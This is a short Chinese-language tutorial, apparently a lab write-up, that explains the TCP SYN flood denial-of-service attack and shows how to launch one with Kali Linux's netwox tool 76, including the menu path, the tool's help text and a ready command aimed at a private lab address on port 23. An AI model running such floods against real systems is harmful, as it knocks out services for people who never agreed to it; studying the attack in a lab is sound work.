SYN攻擊
SYN包:表示連接請求。
攻擊原理
利用了TCP的三次握手機制,A給B發送SYN數據包,B收到該數據包並給A回覆一個SYN+ACK數據包,A收到該數據包不去回覆B對上一個數據包的ACK確認,則會造成B一直等待這個ACK確認,從而會消耗B的主機緩存資源。
SYN攻擊屬於拒絕式服務攻擊(DOS),如果有成百上千個主機,分佈在不同的區域,同時向一個被攻擊者發送大量的SYN數據包,這也就是分佈式拒絕式服務攻擊(DDOS),其破壞量非常之大。
SYN氾濫攻擊的netwox工具序號爲76
root@kali:/home/kali# netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): d
########################### TCP ############################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + TCP spoof
b + TCP client
c + TCP server
d + network audit using TCP
e + dns
f + ftp
g + http
h + ident
i + irc
j + nntp
k + smb
l + smtp
m + telnet
n + whois
Select a node (key in 0123456abcdefghijklmn): d
################# network audit using TCP ##################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 76:Synflood
b - 77:Check if seqnum are predictible
c - 78:Reset every TCP packet
d - 79:Acknowledge every TCP SYN
Select a node (key in 0123456abcd): a
################# help for tool number 76 ##################
Title: Synflood
+------------------------------------------------------------------------+
| This tool sends a lot of TCP SYN packets. |
| It permits to check how a firewall behaves when receiving packets |
| which have to be ignored. |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to spoof. |
+------------------------------------------------------------------------+
Usage: netwox 76 -i ip -p port [-s spoofip]
Parameters:
-i|--dst-ip ip destination IP address {5.6.7.8}
-p|--dst-port port destination port number {80}
-s|--spoofip spoofip IP spoof initialization type {linkbraw}
Example: netwox 76 -i "5.6.7.8" -p "80"
Example: netwox 76 --dst-ip "5.6.7.8" --dst-port "80"
Press 'r' or 'k' to run this tool, or any other key to continue
攻擊代碼
sudo netwox 76 -i 192.168.248.128 -p 23
//攻擊目標服務器的特定端口
效果
發送完這條指令後,我的電腦風扇也已經開始使勁的吹了,趕緊關了關了^ - ^